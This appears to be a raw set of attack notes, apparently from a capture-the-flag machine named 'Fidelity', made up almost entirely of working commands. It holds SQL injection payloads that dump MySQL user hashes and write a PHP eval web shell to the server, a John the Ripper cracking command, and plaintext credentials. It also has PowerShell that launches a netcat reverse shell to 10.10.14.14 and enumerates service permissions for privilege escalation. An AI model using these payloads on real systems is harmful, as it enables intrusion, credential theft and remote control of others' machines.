productName=11'%20and%20updatexml(1,concat(0x7e,database(),0x7e,user(),0x7e,@@datadir),1)#

productName=0'%20union%20select%20group_concat(User),group_concat(Password)%20,3,4,5,6%20from%20mysql.user--+

john --format=mysql-sha1 --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt 

productName=0'%20union%20select%201,'<?php%20eval($_POST[cmd]);?>',3,4,5,6%20into%20outfile'c:/inetpub/wwwroot/yjh.php'--+

Fidelity
$user = "Fidelity\hector" 
$pass = "l33th4x0rhector" 
$secstr = New-Object -TypeName System.Security.SecureString
$pass.ToCharArray() | ForEach-Object {$secstr.AppendChar($_)}
$cred = new-object -typename System.Management.Automation.PSCredential -argumentlist $user, $secstr
Invoke-Command -ScriptBlock { whoami } -Credential $cred -Computer localhost
Invoke-Command -ScriptBlock { c:\temp\nc.exe -e cmd 10.10.14.14 1234 } -Credential $cred -Computer localhost

$user = "Fidelity\administrator" 
$pass = "l3tm3!n" 
$secstr = New-Object -TypeName System.Security.SecureString
$pass.ToCharArray() | ForEach-Object {$secstr.AppendChar($_)}
$cred = new-object -typename System.Management.Automation.PSCredential -argumentlist $user, $secstr
Invoke-Command -ScriptBlock { whoami } -Credential $cred -Computer localhost

gc (Get-PSReadlineOption).HistorySavePath

$acl = Get-ACL -Path HKLM:\SYSTEM\CurrentControlSet\Services
ConvertFrom-SddlString -Sddl $acl.Sddl | Foreach-Object {$_.DiscretionaryAcl}

$services = gci HKLM:\SYSTEM\CurrentControlSet\Services
foreach ($service in $services) { $sddl = (cmd /c sc sdshow $service)[1]; if ($sddl -match "RP[A-Z]*?;;;AU") { write-host $service,$sddl }}

Get-CimInstance win32_service | % {
$result = $_ | Invoke-CimMethod -Name StartService  
[pscustomobject]@{  
Result=$result.ReturnValue  
Name=$_.Name  
Account=$_.StartName  
Startup=$_.StartMode  
DisplayName=$_.Displayname  
}  
} | Sort Name | Where {  
($_.Result -eq 0)`  
-and ($_.Account -eq "LocalSystem")`  
-and ($_.Startup -eq "Manual")  
}